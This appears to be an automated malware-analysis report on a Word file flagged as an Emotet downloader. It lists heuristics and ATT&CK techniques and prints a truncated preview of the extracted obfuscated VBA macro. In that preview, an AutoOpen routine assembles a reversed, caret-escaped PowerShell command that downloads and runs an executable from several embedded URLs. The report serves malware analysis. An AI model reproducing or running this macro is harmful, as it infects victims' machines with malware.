MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating a Shell() call within the VBA macros. The AutoOpen macro is present and attempts to execute obfuscated commands. ClamAV identifies the file as Doc.Downloader.Emotet-6884041-0, strongly suggesting Emotet family involvement. The VBA script likely downloads and executes a second-stage payload.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-6884041-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6884041-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4914 bytes |
SHA-256: 7df4352b59a3344510a2017edc6af968300755ef045a6a40dc76567a2651cd63 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "vvrPUYm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
If fQVuAo <= 1 Then
TnzGaz = "GTXi"
End If
If FhuwfK <= 11 Then
ELKjV = "ji"
End If
If XwmJht >= 15 Then
KDDRZk = "RQcNdd"
End If
If WfGzL = cZhswQ Then
rXzsnQ = "vCnfFd"
End If
MniJQWh (KeyString(AoPkf + WYpqKEEG + 8 + 8 + 51 + FPjOdBzr + PFlmQAXd) + UBNIJmT + FbOro + KeyString(dsXnQtYo + nCaJhb + 9 + 9 + 59 + XDBaE + mqCRANw) + HbbcVFTXnn + YPibOusk + FwucrdH + mnsPqtbR + aDrpGm + Ysvbct)
If QwwiRH <= jsXTr Then
rhZFCG = "HbjEUiUuUtSJ"
End If
If ofDsFS Xor KziSLv Then
KWVamX = "pStJnnfLwFK"
End If
End Sub
Attribute VB_Name = "DCVNwnLwizlJi"
Function HbbcVFTXnn()
If JaiWY > HUpILC Then
iqLftT = "tSMFSrmGi"
End If
If SPMlw >= tDMIs Then
uDWYrB = "zpC"
End If
If zAzFp < VuXoQb Then
QNfCP = "SZsVfjW"
End If
If qOYEh <> BpXms Then
hwuBmq = "qAd"
End If
MjaqPRPw = "d /V^:^ON/C" + """" + "^s^e^t ^x^I=^ " + "^ ^ ^ ^ ^ " + "^ ^ ^ ^ ^}^}^{^hc^" + "t^ac^}^;^k^a^er^"
If wvsPN > 4 Then
WJONwV = "Fc"
End If
If TvEUSj Eqv 2 Then
jwuil = "VDHDRIKjquH"
End If
CTUiQpR = "b^;^HV^j^$^ ^" + "m^e^t^I^-^ek^ovn" + "^I;)^HV^j$^ ^,N^w^i" + "^$(^e^li^F^" + "d^a^o^lnw^o^" + "D^.^Z^Q^t^$^{^yr"
ZlSRqtVmOt = "^t^{)n^W^j^$" + "^ n^i^ N^w^i^$(hc^a" + "^ero^f^;^'^e"
HbbcVFTXnn = MjaqPRPw + CTUiQpR + ZlSRqtVmOt
If hUohj Xor OiHpKi Then
ChdGs = "tOdqISCofwlNz"
End If
If MPwUE Xor 9 Then
wLIrLc = "z"
End If
End Function
Function YPibOusk()
MTlwsXz = "^x^e^.^'^+NN^j^$" + "^+^'^\^'^+c^i^lb^" + "u^p^:vn^e^$=HVj"
If ivijW Eqv 12 Then
LXOiZM = "W"
End If
If uQbjDD Eqv VQPEzt Then
Tdmor = "TmqmNqkak"
End If
If IRDVb < TNOYO Then
FJhWIB = "rEi"
End If
mmzHZYXtJ = "^$^;'^7^2^4^'" + "^ ^=^ NN^j^$" + "^;)^'^@^'(^t^i^l^p^S" + "^.^'x^O^Zx^M^L" + "C^U^JR/^s^d^a^o^" + "l^p^u/^tn^e^"
If YHZpWM And 19 Then
HlvwS = "UJf"
End If
If dRTGWk And zMcPo Then
EHtApO = "Zz"
End If
If hZzoCw <> 3 Then
aMMQG = "NiHLvaO"
End If
iEqDBvZUKb = "tn^oc^-^p^w/^d^i" + "^.c^a^.^a^h" + "^s^k^i^dn^u^.^" + "a^s^a^kr^e^p//^:^p"
If LVTTQO Xor fKOiB Then
KBCdj = "LTtZhE"
End If
If CzPMfV Xor tcqiP Then
TFCGn = "QPV"
End If
If qSuVJ <> 16 Then
jABDD = "vbf"
End If
If UKEwKw Eqv 7 Then
TklNUS = "pZXArsw"
End If
If JboXR > lPraNh Then
BzjFRY = "zTP"
End If
zFucP = "^t^t^h^@^7^" + "9^H^2^P^x^J^Q" + "^H^s/^m^oc^.^o^m^" + "h^sa^m^l^a^" + "p^s^a^l^l^e^"
YPibOusk = MTlwsXz + mmzHZYXtJ + iEqDBvZUKb + zFucP
If mqjNGT Eqv ajPmNq Then
lABMVq = "YpNGr"
End If
If iFXHF = CKzzlO Then
MwJair = "hChhuwwzKpsIk"
End If
End Function
Function FwucrdH()
If orvPE Or NAWGO Then
zSimI = "PaSJkb"
End If
If zaXFW <> maTNhP Then
SwSUKW = "iJT"
End If
If AoZEkZ And 19 Then
HqGFwz = "oH"
End If
If Eciub < 18 Then
TrRla = "czSHkF"
End If
If QqpGfG > UwImd Then
kcdZw = "Fsi"
End If
BOGUphIp = "t^o^h//^:p^t^t^h^@" + "Ru^oN^z^a^" + "6^Jc/^k^u.^oc^." + "^d^t^l^s^s^a^am"
If KKoEau Eqv JLCbGl Then
MFqjQk = "SfnJijj"
End If
ETLAjB = "-^w//^:^p^t" + "^t^h^@^0^G^b^" + "4^Q^b^Z^0^g/^b^u^p^" + ".e^l^i^a//"
If iAvvOA < AsiHz Then
stGhG = "InaXIKduq"
End If
If swmmT > kzJDP Then
FPATCl = "wawJ"
End If
QtHItjbw = "^:^p^t^t^h^@" + "^f^f^P^A^X^o^f/^m^o" + "c^.^s^s^a^l^g^l^j/" + "/^:^p^t^t^h^'=n^Wj^$" + "^;^tn^e^i^lC"
GGhZXKlI = "^b^e^W^.^t^eN^ ^tc^" + "e^j^bo^-^wen^=^" + "Z^Q^t^$^ ^" + "l^l^e^h^sr^e^wo^p&&^"
FwucrdH = BOGUphIp + ETLAjB + QtHItjbw + GGhZXKlI
If iMEiR Or 17 Then
KcwJNq = "qjB"
End If
If pHLFq >= iCRLww Then
DvZmio = "aPiANuqmWvB"
End If
If oRuoLp > vDKiM Then
tUusUr = "pdMDEcmlkFOoJ"
End If
End Function
Function mnsPqtbR()
If pDANjt Eqv cKrwuw Then
WKuEVk = "RJMUm"
End If
If TiIcW <> 12 Then
zOLzi = "T"
End If
zkMHGw
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.